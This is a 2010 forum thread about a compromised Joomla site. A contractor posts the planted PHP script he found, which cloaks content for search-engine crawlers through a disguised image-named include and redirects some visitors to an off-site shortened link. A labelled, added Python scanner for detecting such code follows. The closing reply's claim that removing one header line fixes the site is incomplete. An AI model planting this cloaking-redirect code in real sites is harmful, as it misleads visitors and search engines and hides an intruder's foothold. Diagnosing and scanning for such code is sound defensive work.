Dealing with an ex employee


Post by Code-Geek on Fri Jan 22, 2010 11:34 pm

So guys and gals..
Let's say I have this ex-employee who had FTP and admin access to my Joomla website...
Now when people click some of the links on my site, it sends me to pornhub.com or something.

Like my Google Translate will open up and show this: [screenshot not included]

any ideas on how this could have been done, please let me know.

For now.. I'll be working on it.
Code-Geek
New User
Posts: 2
Joined: Fri Jan 22, 2010 11:19 pm


Re: Dealing with an ex employee

Post by Goatboy on Sat Jan 23, 2010 12:27 am

Just taking a shot in the dark here, but might it have something to do with his FTP AND ADMIN ACCESS?

Change the password, first off. Delete his account if you have not already. Look for any recent changes to other accounts; they might have been compromised. Next, scan the links in question to see where they lead, and fix them. Look for any redirect scripts in your pages. This may take a while, but it needs to be done. As a final measure, I'd suggest making backups of your site and storing them offline. This should make recovery easier in the future.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
Goatboy
Expert
Posts: 2822
Joined: Mon Jul 07, 2008 9:35 pm


Re: Dealing with an ex employee

Post by sanddbox on Sat Jan 23, 2010 12:49 am

Code-Geek wrote: I have this ex employee that had ftp and admin access

Gee, I can't think of anything!

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat
sanddbox
Expert
Posts: 2331
Joined: Sat Jul 04, 2009 5:20 pm


Re: Dealing with an ex employee

Post by Code-Geek on Sat Jan 23, 2010 12:57 am

lol this isn't actually my company..
Someone who hired me..
But yes, they removed his FTP and admin access as soon as they figured that out..
Sorry I didn't clarify.
Thanks for the input though.

BTW.. after getting the entire site downloaded and sifting through tons of code, I found this script.

Code:
<?php

$host=$_SERVER['HTTP_HOST'];
$agent=$_SERVER['HTTP_USER_AGENT'];

    $server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
    $server_referer = @$_SERVER['HTTP_REFERER'];
    $server_host = @$_SERVER['HTTP_HOST'];
    $server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $server_remote_addr = @$_SERVER['REMOTE_ADDR'];
    $server_query_string = @$_SERVER['QUERY_STRING'];
    $server_signature = @$_SERVER['SERVER_SIGNATURE'];
    $server_request = @$_SERVER['REQUEST_URI'];

function detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$server_referer,$enable_logging){
    $stop_ips_masks = array(
        "66\.249\.[6-9][0-9]\.[0-9]+",    // Google    NetRange:   66.249.64.0 - 66.249.95.255
        "74\.125\.[0-9]+\.[0-9]+",        // Google     NetRange:   74.125.0.0 - 74.125.255.255
        "65\.5[2-5]\.[0-9]+\.[0-9]+",    // MSN        NetRange:   65.52.0.0 - 65.55.255.255,
        "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255
        "67\.195\.[0-9]+\.[0-9]+",        // Yahoo#2    NetRange:   67.195.0.0 - 67.195.255.255
        "72\.30\.[0-9]+\.[0-9]+",        // Yahoo#3    NetRange:   72.30.0.0 - 72.30.255.255
        "38\.[0-9]+\.[0-9]+\.[0-9]+",     // Cuill:     NetRange:   38.0.0.0 - 38.255.255.255
        "93\.172\.94\.227",                // MacFinder
        "212\.100\.250\.218",            // Wells Search II
        "71\.165\.223\.134",            // Indy Library
        "70\.91\.180\.25",
        "65\.93\.62\.242",
        "74\.193\.246\.129",
        "213\.144\.15\.38",
        "195\.92\.229\.2",
        "70\.50\.189\.191",
        "218\.28\.88\.99",
        "165\.160\.2\.20",
        "89\.122\.224\.230",
        "66\.230\.175\.124",
        "218\.18\.174\.27",
        "65\.33\.87\.94",
        "67\.210\.111\.241",
        "81\.135\.175\.70",
        "64\.69\.34\.134",
        "89\.149\.253\.169",

        "64\.233\.1[6-8][1-9]\.[0-9]+",
        "64\.233\.19[0-1]\.[0-9]+",
        //google from iplists
        "209\.185\.108\.[0-9]+",
        "209\.185\.253\.[0-9]+",
        "209\.85\.238\.[0-9]+",
        "216\.239\.33\.9[6-9]",
        "216\.239\.37\.9[8-9]",
        "216\.239\.39\.9[8-9]",
        "216\.239\.41\.9[6-9]",
        "216\.239\.45\.4",
        "216\.239\.46\.[0-9]+",
        "216\.239\.51\.9[6-9]",
        "216\.239\.53\.9[8-9]",
        "216\.239\.57\.9[6-9]",
        "216\.239\.59\.9[8-9]",
        "216\.33\.229\.163",
        "64\.233\.173\.[0-9]+",
        "64\.68\.8[0-9]\.[0-9]+",
        "64\.68\.9[0-2]\.[0-9]+",
        "72\.14\.199\.[0-9]+",
        "8\.6\.48\.[0-9]+",
        //google from iplists
// 10.0.0.0 - 10.255.255.255 ian:        "207\.211\.40\.82",
        "67\.162\.158\.146",
        "66\.255\.53\.123",
        "24\.200\.208\.112",
        "129\.187\.148\.240",
        "129\.187\.148\.244",
        "199\.126\.151\.229",
        "118\.124\.32\.193",
        "89\.149\.217\.191"
    );
    $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawl", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress",'Charlotte','wwwster','Python','urllib','perl','libwww','lynx','Twiceler','rambler','yandex');

    $server_user_agent = preg_replace("|User\.Agent\:[\s ]?|i", "", @$server_user_agent);

    $is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";
    foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("$stop_ip_mask", $server_ip)) {
        $is_human = false;  break;
    }
    if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$server_user_agent) !== false){
        $is_human = false;  break;
    }
    if($is_human and !eregi("^[a-zA-Z]{5,}", @$server_user_agent)) {
        $is_human = false;
    }

    if($is_human and strlen($server_user_agent)<=11) {
        $is_human = false;
    }

    if(stristr($server_referer,$server_query_string)) {
        $is_human = false;
    }

    return $is_human;
}

@$is_human = @detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$server_referer,$enable_logging);
if (@$is_human==false)
{
include "icon2_old.png.php";
exit;
}
if (preg_match('/porn/', $_SERVER["HTTP_REFERER"]) > 0)
{
header("Location: http://bit.ly/7IDKb0");
exit;  }

?>
Code-Geek
New User
Posts: 2
Joined: Fri Jan 22, 2010 11:19 pm
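Added example, not part of the thread and not code from Code-Geek's site: a Python scanner that does the sweep Goatboy suggested ("look for any redirect scripts in your pages") over a downloaded copy of the site, using the traits of the script above as indicators. It flags off-site header("Location: ...") calls, branches on HTTP_REFERER, includes of image-named .php files, string literals holding escaped crawler IP prefixes, and eregi() calls, and it also names any file with a double extension such as icon2_old.png.php. That last check matters because deleting only the header() line leaves the crawler-facing include in place, so search engines keep seeing whatever that file serves. The indicator regexes, function names and sample files are constructed for this illustration; example.test stands in for the site's own hostname and shortener.example for the off-site target.

```python
"""Added example (not from the thread): walk a downloaded site tree and flag PHP
files carrying the traits of the script Code-Geek posted. Indicator names,
regexes and the sample files are constructed for this illustration."""
import os
import re
import tempfile
from urllib.parse import urlparse

# Regexes over file text; each indicator name is chosen for this example.
INDICATORS = {
    # header("Location: http://...") with the target URL captured
    "redirect": re.compile(r'header\s*\(\s*["\']Location:\s*(https?://[^"\'\s]+)', re.I),
    # branching on the Referer header, as the script does with /porn/
    "referer_check": re.compile(r'\$_SERVER\s*\[\s*["\']HTTP_REFERER["\']\s*\]'),
    # include/require of a file named like an image but executed as PHP
    "image_named_include": re.compile(
        r'\b(?:include|require)(?:_once)?\b[^;]*?\.(?:png|jpe?g|gif|ico)\.php', re.I),
    # string literals holding regex-escaped IPv4 prefixes such as "66\.249\."
    "ip_regex_literal": re.compile(r'["\']\d{1,3}\\\.(?:\d{1,3}|\[[^\]]+\])\\\.'),
    # eregi() is long deprecated; its presence marks legacy or dropped-in code
    "eregi": re.compile(r'\beregi\s*\('),
}
IMAGE_NAMED_PHP = re.compile(r'\.(?:png|jpe?g|gif|ico)\.php$', re.I)


def scan_file(path, own_hosts):
    """Return {indicator: detail} for one file; an empty dict means nothing found."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = {}
    for name, rx in INDICATORS.items():
        hits = rx.findall(text)
        if not hits:
            continue
        if name == "redirect":
            # keep only redirects that leave the site's own hostnames
            offsite = [u for u in hits if urlparse(u).hostname not in own_hosts]
            if offsite:
                findings["offsite_redirect"] = offsite
            continue
        findings[name] = len(hits)
    base = os.path.basename(path)
    if IMAGE_NAMED_PHP.search(base):
        findings["image_named_file"] = base
    return findings


def scan_tree(root, own_hosts):
    """Return {relative_path: findings} for every *.php file (double extensions included)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fn)
            found = scan_file(full, own_hosts)
            if found:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return report


def build_sample_site():
    """Write a throwaway site tree of constructed files and return its path."""
    root = tempfile.mkdtemp(prefix="site_")
    files = {
        # legitimate: the redirect stays on the site's own host
        "index.php": '<?php header("Location: https://example.test/home"); exit; ?>',
        # constructed stand-in for the posted script: crawler IP list, eregi(),
        # an image-named include for crawlers, and a referer-gated off-site redirect
        "components/shim.php": (
            "<?php\n"
            '$stop_ips_masks = array("66\\.249\\.[6-9][0-9]\\.[0-9]+", "74\\.125\\.[0-9]+\\.[0-9]+");\n'
            'foreach ($stop_ips_masks as $m) if (eregi($m, $_SERVER["REMOTE_ADDR"])) '
            '{ include "icon2_old.png.php"; exit; }\n'
            "if (preg_match('/porn/', $_SERVER[\"HTTP_REFERER\"]) > 0) "
            '{ header("Location: http://shortener.example/xyz"); exit; }\n'
            "?>"
        ),
        # the payload file carries no redirect; only its double extension gives it away
        "components/icon2_old.png.php": '<?php echo "content shown to crawlers only"; ?>',
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, found in sorted(scan_tree(site, {"example.test"}).items()):
        print(rel, found)
```

Run scan_tree against the downloaded tree with the set of hostnames the site legitimately uses. Anything reported under offsite_redirect, image_named_include or image_named_file deserves a manual read of the file, while a lone eregi hit inside an old extension is usually just legacy code; the index.php in the sample shows that an on-site redirect produces no report at all.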


Re: Dealing with an ex employee

Post by Goatboy on Sat Jan 23, 2010 1:25 am

Did you even read that code? 99% of the lines detect spiders, and the second-to-last one redirects to PornTube. Remove the header line and it's fixed.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
Goatboy
Expert
Posts: 2822
Joined: Mon Jul 07, 2008 9:35 pm


